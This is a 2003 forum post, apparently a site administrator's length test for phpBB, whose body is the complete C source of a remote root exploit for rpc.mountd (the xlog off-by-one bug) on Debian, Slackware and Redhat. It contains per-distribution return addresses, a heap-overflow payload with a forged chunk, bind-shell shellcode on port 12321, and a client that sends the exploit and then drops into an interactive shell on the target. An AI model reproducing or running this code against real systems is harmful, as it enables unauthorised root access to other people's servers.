alorbach
Site Admin
Joined: 13 Feb 2003
Posts: 733
|
 Posted: Wed Sep 17, 2003 3:52 pm Post subject: Extreme large test posting from AL |
 |
|
I am testing when phpbb times out
| Code: |
/*
* UNPUBLISHED SOURCE CODE *** UNPUBLISHED SOURCE CODE *** UNPUBLISHED SOURCE CODE ***
* Private research matrial you dont shoult to have this !!!
*
* remote rpc.mountd exploit for the recent xlog vunl
* written by newroot :)
*
* attached is a full working REMOTE ROOT EXPLOIT for any debians rpc.mountd
* thats compiled with gcc 2.95.4
*
* ive written this couse the security industry has stolen our wonderful off by one bugs
* maybee its the last time i exploit one of the wonderfull of-by-ones
*
* so greetings goes first to:
* Janusz Niewiadomski -- founder of the bug (public)
* klog -- brougt us the off by one techniqe
* ^sq -- founds some bugs in the xploitcode and brings us more offsets
* sorbo -- i recode my exploit as i saw his xdr things
* so many creditz goes to him
* newroot -- [www.newroot.de]
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <rpc/rpc.h>
#include <rpc/clnt.h>
#include <rpc/xdr.h>
#include <rpcsvc/mount.h>
#define BUFSIZE 1024
#define ALIGN 1
int connect_host(char *, int);
void shell(int);
void do_xp(char *, int);
extern char *optarg;
extern int optind, opterr, optopt;
struct _targets {
char desc[2048];
int align;
unsigned long ret_loc;
unsigned long ret_addr;
} targets[] = {
{ "devel",
1,
0xbfffe000,
0x66666666
},
{ "Debian 3.0(x86)",
1,
0xbfffe000,
0x0805b018
},
{ "Slackware 8.1(x86)",
3,
0xbfffdf00,
0x0805d17c
},
{ "Redhat 6.2(x86)",
3,
0xbfffe300,
0x0805d8f8
},
{ 0x00, 0x00 , 0x00}
};
struct fakechunk
{
uint32_t prev_size;
uint32_t size;
uint32_t junk;
uint32_t bk;
uint32_t fd;
};
int verbose; /* extra output */
int align; /* padding */
int t; /* targetnumber */
unsigned long ret_addr;
unsigned long ret_loc;
unsigned char shellcode[] =
// port 12321 - linux shellcode
"\xeb\x0a""dont tell!"
"\x55\x89\xe5\x31\xc0\x66\xc7\x45\xf2\x30"
"\x21\x89\x45\xf4\x89\x45\xf8\x89\x45\xfc"
"\x89\x45\xe8\xfe\xc0\x89\xc3\x89\x45\xe4"
"\xfe\xc0\x66\x89\x45\xf0\x89\x45\xe0\xb0"
"\x66\x8d\x4d\xe0\xcd\x80\x89\x45\xe0\xb0"
"\x66\xfe\xc3\x8d\x55\xf0\x89\x55\xe4\x31"
"\xd2\xb2\x42\x80\xea\x32\x89\x55\xe8\x8d"
"\x4d\xe0\xcd\x80\xb0\x66\xfe\xc3\xfe\xc3"
"\xfe\xc3\x89\x5d\xe4\xfe\xcb\x8d\x4d\xe0"
"\xcd\x80\xb0\x66\xfe\xc3\x31\xd2\x89\x55"
"\xe4\x8d\x4d\xe0\xcd\x80\x89\xd9\x89\xc3"
"\xfe\xc9\xfe\xc9\xfe\xc9\x31\xc0\xb0\x3f"
"\xcd\x80\xfe\xc1\xe2\xf4\x51\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
"\x89\xe2\x53\x89\xe1\x31\xc0\xb0\x3d\x2c"
"\x32\xcd\x80";
void help () {
fprintf (stderr, "remote rpc.mountd exploit\n");
fprintf (stderr, "written by newroot\n");
fprintf (stderr, "---------------------\n");
fprintf (stderr, "ussage: %s [options] <dest>\n\n", "mounty");
fprintf (stderr, "options are:\n");
fprintf (stderr, "\t-t <num>\t# target type use 0 for list\n");
fprintf (stderr, "\t-a <num>\t# align\n");
fprintf (stderr, "\t-l <loc>\t# return localtion 0xdeadface\n");
fprintf (stderr, "\t-b <addy>\t# return adress 0xdeadface\n");
fprintf (stderr, "\t-v\t\t# verbose output\n\n");
}
void print_targets () {
int i;
fprintf (stdout, "Supported targets:\n");
for (i=0; targets[i].ret_addr != 0; i++) {
fprintf (stdout, "\t%i) - %s\n", i+1, targets[i].desc);
}
}
int connect_host(char * host,int port)
{
struct sockaddr_in addr;
struct hostent *he;
int sock;
he=gethostbyname(host);
if (he==NULL) return EXIT_FAILURE;
sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock==-1) return EXIT_FAILURE;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) sock=-1;
return sock;
}
void shell(int thesock)
{
fd_set fds;
char buff[1024], *cmd="/bin/uname -a;/usr/bin/id;\n";
int n;
FD_ZERO(&fds);
FD_SET(thesock, &fds);
FD_SET(0, &fds);
send(thesock, cmd, strlen(cmd), 0);
while(1) {
FD_SET(thesock,&fds);
FD_SET(0,&fds);
if(select(thesock+1,&fds, NULL, NULL, NULL)<0)
break;
if( FD_ISSET(thesock, &fds) ) {
if(!(n=recv(thesock,buff,sizeof(buff),0))) {
exit(EXIT_FAILURE);
}
if (!write (1, buff, n))
break;
}
if ( FD_ISSET(0, &fds) ) {
n = read (0, buff, sizeof(buff));
if(n <= 0){
fprintf(stderr,"EOF\n");
exit(EXIT_FAILURE);
}
if(send(thesock,buff,n,0)<0) break;
}
}
fprintf(stderr,"done.\n");
exit(EXIT_SUCCESS);
}
/** trick from sorbos one creditz to him**/
bool_t xdr_dirpath(XDR *xdrs, dirpath *objp) {
return xdr_string(xdrs, objp, MNTPATHLEN);
}
void do_xp(char *host, int t) {
int thesock;
struct sockaddr_in sin;
struct hostent *he;
struct timeval tv;
CLIENT *client; /* rpc/clnt.h */
dirpath DIR;
fhstatus *fh;
struct fakechunk chunk;
int *ptr;
char payload[BUFSIZE+1];
chunk.prev_size = 0xfffffffc;
chunk.size = 0xfffffffc;
chunk.junk = 0xbfffffa1;
memset (payload, 0x41, sizeof(payload));
payload[0] = '/';
payload[BUFSIZE]= 0x00;
for(ptr = (int *)((char*)payload+targets[t].align+300);
ptr < (int*)(payload+sizeof(payload)-6); ptr++)
{
*ptr = targets[t].ret_addr+4+8;
}
chunk.bk = (targets[t].ret_loc)+4-12;
chunk.fd = (targets[t].ret_addr)+40;
memcpy(payload+4,&chunk,sizeof(chunk));
memcpy(payload+40,shellcode,strlen(shellcode));
he=gethostbyname(host);
if (he==NULL) exit(EXIT_FAILURE);
memcpy(&sin.sin_addr, he->h_addr, he->h_length);
sin.sin_port = 0;
sin.sin_family = AF_INET;
fprintf (stdout, "[*] target host: %s\n", host);
fprintf (stdout, "[*] target ip : %s\n", inet_ntoa(sin.sin_addr.s_addr));
thesock = RPC_ANYSOCK;
client = clnttcp_create(&sin, MOUNTPROG, MOUNTVERS, &thesock, 0, 0);
if (!client) {
fprintf (stdout, "[-] Exploit Failed!\n");
exit (EXIT_FAILURE);
}
client->cl_auth = authunix_create_default();
tv.tv_sec = 6;
tv.tv_usec = 0;
DIR = payload;
fprintf (stdout, "[*] Sending exploit!\n");
// fh = mountproc_mnt_1 (&DIR, client);
if(clnt_call(client, MOUNTPROC_MNT, (xdrproc_t) xdr_dirpath,
(void *)&DIR,(xdrproc_t) xdr_void, NULL,tv) == RPC_SUCCESS) {
exit(EXIT_FAILURE);
}
}
int main (int argc, char **argv) {
char c;
int opterr = 0;
int thesock;
while ((c = getopt(argc, argv, "t:a:l:b:vh")) != EOF) {
switch (c) {
case 't':
t = atoi (optarg);
if (t == 0) {
print_targets();
return EXIT_SUCCESS;
} else { --t; }
break;
case 'a':
align = atoi (optarg);
break;
case 'l':
sscanf (optarg, "%x" , &ret_loc);
break;
case 'b':
sscanf (optarg, "%x" , &ret_addr);
break;
case 'v':
++verbose;
break;
default:
help ();
return EXIT_SUCCESS;
break;
}
}
if (argc < 2 ) {
help();
return EXIT_FAILURE;
}
fprintf (stderr, "rpc.mountd remote exploit -- written by newroot!\n");
fprintf(stdout, "[*] Ok going to exploit something...\n");
if (ret_loc) {
if (verbose) {
printf ("[*] setting return-location to %#x\n", ret_loc);
}
targets[t].ret_loc = ret_loc;
}
if (ret_addr) {
if (verbose) {
printf ("[*] setting return-adress to %#x\n", ret_addr);
}
targets[t].ret_addr = ret_addr;
}
if (align) {
if (verbose) {
printf ("[*] align to %#x\n", align);
}
targets[t].align = align;
}
do_xp(argv[(argc-1)], t);
thesock = connect_host (argv[argc-1], 12321);
if (thesock > 3) {
fprintf(stdout, "[*] Exploit successful !!!\n");
fprintf(stdout, "[*] waiting for shell ...\n");
shell(thesock);
} else {
fprintf(stderr, "[-] Failed!\n");
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
|
|
|
FAQ
Search
Memberlist
Usergroups
Register
Profile
Log in to check your private messages
Log in
